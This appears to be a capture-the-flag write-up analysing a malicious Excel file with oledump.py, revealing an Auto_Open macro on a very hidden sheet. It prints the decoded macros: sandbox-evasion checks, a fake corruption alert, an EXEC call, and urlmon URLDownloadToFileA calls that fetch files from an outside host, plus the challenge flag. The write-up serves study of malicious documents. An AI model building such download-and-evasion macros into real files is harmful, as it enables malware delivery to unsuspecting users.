Reality Challenge

PART 1 : GIVEN FILES

power.tar.gz

$ md5sum reality.tar.gz

  4f494a43e54d1ba0936e58a299f25fc0  reality.tar.gz

$ sha1sum reality.tar.gz

  f74ea01066dc1b1bd25a900def3d7bd1b410f9be  reality.tar.gz

$ gzip -d reality.tar.gz

$ tar xvf reality.tar.gz

  reality/
  reality/readme.txt
  reality/topsecret.xls

PART 2 : CHALLENGE DESCRIPTION

The file, readme.txt, reads the following:

Challenge Description:

        You must obtain the hidden secrets in order to see the reality.

PART 3 : THE MALDOC

Opening topsecret.xls reveals nothing much:

Microsoft Excel is capable of using OLE (Object Linking and Embedding) which allows you to take objects in a document and place it in other applications or perhaps even itself.

I decided to check if the excel file is using Object Linking and Embedding using oledump.py:

$ python oledump.py -p plugin_biff --pluginoptions "-x" "../topsecret.xls"

  ---omitted---
  0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
  0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden
  0018     23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
  0006    598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgRefV R501C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgRefV R501C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgRefV R501C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgRefV R501C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgRefV R501C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgRefV R501C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgRefV R501C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006     37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
  0006     37 FORMULA : Cell Formula - R59C18 len=15 ptgStr "Sheet2" ptgBool TRUE ptgFuncVarV args 2 func WORKBOOK.HIDE (0x817f)
  ---omitted---

There is a sheet hidden using WORKBOOK.HIDE:

Which has the following Excel functions written vertically with each character placed beside to the right of its ASCII decimal value:

=ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.",2)
=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)
=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)
=IF(GET.WORKSPACE(19),,CLOSE(FALSE))
=IF(GET.WORKSPACE(42),,CLOSE(FALSE))
=IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))), ,CLOSE(FALSE))
=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://easteregg.rootcon.net/AZfzv7ckfbxj2Q6X/GC3Z543PZQL2buV ","c:\Users\Public\flag.txt",0,0)
=CLOSE(FALSE)

PART 4 : GETTING THE FLAG

The highlighted function from earlier seems to download a file and then is saved to c:\Users\Public\flag.txt and attempting to download the same file gives you:

The flag is somewhere else…

Going back to the OLE dump:

$ python oledump.py -p plugin_biff --pluginoptions "-x" "../topsecret.xls"

  ---omitted---
  0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
  0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden
  0018     23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
  0006    598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgRefV R501C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgRefV R501C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgRefV R501C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgRefV R501C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgRefV R501C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgRefV R501C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgRefV R501C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006     37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
  0006     37 FORMULA : Cell Formula - R59C18 len=15 ptgStr "Sheet2" ptgBool TRUE ptgFuncVarV args 2 func WORKBOOK.HIDE (0x817f)
  ---omitted---

It seems that the eight formulas written vertically from earlier are being referenced in ROWS 50-57 in COL 49171 and the characters starting from ROW 500 downward are being concatenated using ptgConcat to build the entire function/formula.

$ python oledump.py -p plugin_biff --pluginoptions "-x" "../topsecret.xls"

  ---omitted---
  0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
  0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden
  0018     23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
  0006    598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgRefV R501C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgRefV R501C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgRefV R501C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgRefV R501C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgRefV R501C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgRefV R501C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgRefV R501C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006     37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
  0006     37 FORMULA : Cell Formula - R59C18 len=15 ptgStr "Sheet2" ptgBool TRUE ptgFuncVarV args 2 func WORKBOOK.HIDE (0x817f)
  ---omitted---

Now, if you consider COL 49154 to be column B in Sheet 2, then COL 49156 should be column D, COL 49158 should be column F, and so on…

$ python oledump.py -p plugin_biff --pluginoptions "-x" "../topsecret.xls"

  ---omitted---
  0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible
  0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden
  0018     23 LABEL : Cell Value, String Constant - build-in-name 1 Auto_Open
  0006    598 FORMULA : Cell Formula - R50C18 len=576 ptgRefV R500C49154 ptgRefV R501C49154 ptgConcat ---omitted--- ptgRefV R593C49154 ptgConcat ptgAttr ptgRef R50C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R51C18 len=254 ptgRefV R500C49156 ptgRefV R501C49156 ptgConcat ---omitted--- ptgRefV R540C49156 ptgConcat ptgRef R51C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    276 FORMULA : Cell Formula - R52C18 len=254 ptgRefV R500C49158 ptgRefV R501C49158 ptgConcat ---omitted--- ptgRefV R540C49158 ptgConcat ptgRef R52C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R53C18 len=224 ptgRefV R500C49160 ptgRefV R501C49160 ptgConcat ---omitted--- ptgRefV R535C49160 ptgConcat ptgRef R53C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    246 FORMULA : Cell Formula - R54C18 len=224 ptgRefV R500C49162 ptgRefV R501C49162 ptgConcat ---omitted--- ptgRefV R535C49162 ptgConcat ptgRef R54C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    414 FORMULA : Cell Formula - R55C18 len=392 ptgRefV R500C49164 ptgRefV R501C49164 ptgConcat ---omitted--- ptgRefV R563C49164 ptgConcat ptgRef R55C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    888 FORMULA : Cell Formula - R56C18 len=866 ptgRefV R500C49167 ptgRefV R501C49167 ptgConcat ---omitted--- ptgRefV R642C49167 ptgConcat ptgRef R56C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006    108 FORMULA : Cell Formula - R57C18 len=86 ptgRefV R500C49169 ptgRefV R501C49169 ptgConcat ---omitted--- ptgRefV R512C49169 ptgConcat ptgRef R57C49171 ptgFuncVarV args 2 func FORMULA (0x8060)
  0006     37 FORMULA : Cell Formula - R58C18 len=15 ptgStr "calc.exe" ptgFuncVarV args 1 func EXEC (0x006e)
  0006     37 FORMULA : Cell Formula - R59C18 len=15 ptgStr "Sheet2" ptgBool TRUE ptgFuncVarV args 2 func WORKBOOK.HIDE (0x817f)
  ---omitted---

The expected columns where the function/formulas are built should be B → D → F → H → J → L → N → P but as you can see from the dump, COL 49164 jumps to COL 49167 meaning column L jumped to column O which shouldn’t be the case.

If you look at the Excel Sheet, it would show that column N is missing and when revealed:

It shows a new set of numbers which when converted to ASCII:

=CALL("urlmon","URLDownloaToFileA","JJCCJJ",0,"http://easteregg.rootcon.net/sFpWgx9WkHQQ542K/36xQCWUDNaJpbTB","c:\Users\Public\flag.txt",0,0)

A new download link is found which is also saved to c:\Users\Public\flag.txt:

$ cat 36xQCWUDNaJpbTB

  rc_easter{r34l1ty_15_0ft3n__d1s4pp01nt1ng}

The real flag is revealed after downloading the file!!

[SITE PAGES]

[HTB CHALLENGES]

[CTF EVENTS]

jebidiah-anthony

write-ups and what not

Reality Challenge

PART 1 : GIVEN FILES

PART 2 : CHALLENGE DESCRIPTION

PART 3 : THE MALDOC

PART 4 : GETTING THE FLAG

FLAG : rc_easter{r34l1ty_15_0ft3n__d1s4pp01nt1ng}